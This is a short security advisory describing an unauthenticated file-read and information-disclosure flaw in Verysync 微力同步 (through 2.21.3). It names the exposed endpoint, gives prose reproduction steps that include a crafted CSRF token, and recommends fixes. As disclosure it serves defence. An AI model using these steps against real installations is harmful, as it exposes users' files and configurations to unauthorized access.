Verysync 微力同步 Information Disclosure Vulnerability in Web Administration Module

A vulnerability allowing unauthorized access to sensitive information has been identified in Verysync 微力同步 versions through 2.21.3. The issue resides in the Web Administration Module, specifically within an unprotected function of the file '/rest/f/api/resources/f96956469e7be39d'. This vulnerability arises because the module's core interface lacks proper authentication, enabling remote attackers to access and retrieve confidential data such as device IDs, system configurations, and synchronization files, potentially leading to further targeted attacks.

Impact

Exploitation of this vulnerability allows for arbitrary file read access, enabling attackers to traverse and read synchronization files and sensitive system files from the affected device.

Reproduction

The vulnerability can be reproduced by sending a GET request to the vulnerable endpoint '/rest/f/api/resources/f96956469e7be39d' without any authentication. The request can include a crafted CSRF token in the cookie and header to bypass certain protections. Once the request is processed, the response will contain sensitive information from the device, such as file paths and system configurations.

Remediation

Users are advised to implement authentication for the Web Administration Module and to restrict access to local or whitelisted devices. Additionally, enabling log auditing to monitor access records and file reading operations can help detect and respond to abnormal activities.